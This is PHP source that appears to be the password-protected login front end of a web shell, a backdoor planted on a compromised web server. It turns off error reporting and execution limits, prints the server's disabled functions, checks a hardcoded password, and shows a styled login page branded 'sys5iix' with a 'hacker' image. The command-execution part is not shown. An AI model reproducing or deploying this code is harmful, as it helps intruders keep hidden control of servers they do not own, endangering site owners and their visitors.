session_start();error_reporting(0);set_time_limit(0);ini_set('memory_limit', '-1');ini_set('upload_max_filesize', '50M');ini_set('post_max_size', '50M');echo ini_get("disable_functions");$password = "admin5iix"; if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) { if (isset($_POST['login_password'])) { if ($_POST['login_password'] === $password) { $_SESSION['logged_in'] = true; } else { $login_error = "Incorrect password!"; showLoginForm($login_error); exit; } } else { showLoginForm(); exit; }}function showLoginForm($error = "") { echo '<!DOCTYPE html> <html dir="rtl">
<meta charset="UTF-8">Login <title>Login</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif; background-color: #191919ff; color: white; display: flex; justify-content: center; align-items: center; min-height: 100vh; padding: 20px; } .login-wrapper { display: flex; width: 100%; max-width: 600px; gap: 30px; background: rgba(255, 255, 255, 0.05); border-radius: 15px; padding: 20px; box-shadow: 0 10px 30px rgba(0, 0, 0, 0.3); } .login-form { flex: 1; padding: 30px; background: rgba(255, 255, 255, 0.03); border-radius: 10px; backdrop-filter: blur(5px); } .login-form h2 { text-align: center; color: #fff; margin-bottom: 30px; font-size: 24px; font-weight: 600; } .input-group { margin-bottom: 20px; } input[type="password"] { width: 100%; padding: 14px; border: 1px solid #333; border-radius: 8px; background: rgba(255, 255, 255, 0.1); color: white; font-size: 16px; outline: none; transition: border 0.3s ease; } input[type="password"]:focus { border-color: #4CAF50; background: rgba(255, 255, 255, 0.15); } button { background: #4CAF50; color: white; border: none; padding: 14px; border-radius: 8px; cursor: pointer; font-size: 16px; width: 100%; transition: background 0.3s ease; } button:hover { background: #45a049; } .error { background: #f44336; color: white; padding: 10px; border-radius: 5px; margin-bottom: 20px; font-size: 14px; } .anime-image { flex: 1; display: flex; justify-content: center; align-items: center; position: relative; } .anime-image img { width: 100%; height: 100%; object-fit: cover; border-radius: 5px; border: 3px solid #4CAF50; box-shadow: 0 0 15px rgba(76, 175, 80, 0.3); transition: transform 0.3s ease; } </style> <div class="login-wrapper"> <div class="login-form"> sys5iix
'; if (!empty($error)) { echo '<div class="error">' . htmlspecialchars($error) . '</div>'; } echo ' </div> <div class="anime-image"> <img src="https://i.imgur.com/sVvS0H1.jpeg" alt="hacker"> </div> </div>